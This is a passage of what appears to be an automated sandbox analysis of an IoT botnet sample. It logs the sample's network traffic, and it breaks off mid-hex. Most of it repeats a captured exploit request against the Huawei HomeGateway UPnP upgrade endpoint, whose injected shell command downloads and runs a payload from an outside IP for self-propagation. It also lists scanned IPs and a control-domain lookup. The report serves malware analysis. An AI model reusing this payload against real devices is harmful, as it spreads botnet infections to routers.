78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: /tmp/skt.arm6.elf (PID: 5497)Socket: 127.0.0.1::8345Jump to behavior
            Source: unknownTCP traffic detected without corresponding DNS query: 63.252.52.130
            Source: unknownTCP traffic detected without corresponding DNS query: 149.158.0.239
            Source: unknownTCP traffic detected without corresponding DNS query: 157.103.231.32
            Source: unknownTCP traffic detected without corresponding DNS query: 157.242.26.164
            Source: unknownTCP traffic detected without corresponding DNS query: 157.14.47.189
            Source: unknownTCP traffic detected without corresponding DNS query: 197.107.42.77
            Source: unknownTCP traffic detected without corresponding DNS query: 157.225.74.255
            Source: unknownTCP traffic detected without corresponding DNS query: 157.169.220.140
            Source: unknownTCP traffic detected without corresponding DNS query: 61.134.19.112
            Source: unknownTCP traffic detected without corresponding DNS query: 157.71.219.150
            Source: unknownTCP traffic detected without corresponding DNS query: 41.125.79.202
            Source: unknownTCP traffic detected without corresponding DNS query: 41.160.209.172
            Source: unknownTCP traffic detected without corresponding DNS query: 157.27.192.134
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.126.166
            Source: unknownTCP traffic detected without corresponding DNS query: 195.174.185.19
            Source: unknownTCP traffic detected without corresponding DNS query: 157.66.140.53
            Source: unknownTCP traffic detected without corresponding DNS query: 197.9.214.92
            Source: unknownTCP traffic detected without corresponding DNS query: 197.215.197.41
            Source: unknownTCP traffic detected without corresponding DNS query: 41.140.174.84
            Source: unknownTCP traffic detected without corresponding DNS query: 70.18.22.70
            Source: unknownTCP traffic detected without corresponding DNS query: 197.135.3.47
            Source: unknownTCP traffic detected without corresponding DNS query: 157.69.1.46
            Source: unknownTCP traffic detected without corresponding DNS query: 157.20.240.126
            Source: unknownTCP traffic detected without corresponding DNS query: 157.148.80.52
            Source: unknownTCP traffic detected without corresponding DNS query: 41.20.158.92
            Source: unknownTCP traffic detected without corresponding DNS query: 157.2.228.76
            Source: unknownTCP traffic detected without corresponding DNS query: 41.247.121.209
            Source: unknownTCP traffic detected without corresponding DNS query: 208.120.222.11
            Source: unknownTCP traffic detected without corresponding DNS query: 41.132.162.10
            Source: unknownTCP traffic detected without corresponding DNS query: 138.53.60.98
            Source: unknownTCP traffic detected without corresponding DNS query: 54.91.208.54
            Source: unknownTCP traffic detected without corresponding DNS query: 135.255.104.163
            Source: unknownTCP traffic detected without corresponding DNS query: 157.0.25.157
            Source: unknownTCP traffic detected without corresponding DNS query: 204.176.244.95
            Source: unknownTCP traffic detected without corresponding DNS query: 41.245.145.219
            Source: unknownTCP traffic detected without corresponding DNS query: 157.84.183.50
            Source: unknownTCP traffic detected without corresponding DNS query: 77.37.205.186
            Source: unknownTCP traffic detected without corresponding DNS query: 157.208.121.16
            Source: unknownTCP traffic detected without corresponding DNS query: 41.72.198.186
            Source: unknownTCP traffic detected without corresponding DNS query: 197.219.172.229
            Source: unknownTCP traffic detected without corresponding DNS query: 41.41.3.99
            Source: unknownTCP traffic detected without corresponding DNS query: 197.200.136.122
            Source: unknownTCP traffic detected without corresponding DNS query: 52.41.97.210
            Source: unknownTCP traffic detected without corresponding DNS query: 41.171.138.183
            Source: unknownTCP traffic detected without corresponding DNS query: 41.54.213.97
            Source: unknownTCP traffic detected without corresponding DNS query: 45.248.203.157
            Source: unknownTCP traffic detected without corresponding DNS query: 41.180.58.47
            Source: unknownTCP traffic detected without corresponding DNS query: 157.53.132.244
            Source: unknownTCP traffic detected without corresponding DNS query: 197.153.35.103
            Source: unknownTCP traffic detected without corresponding DNS query: 41.127.71.99
            Source: global trafficDNS traffic detected: DNS query: bots.gxz.me
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 464Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 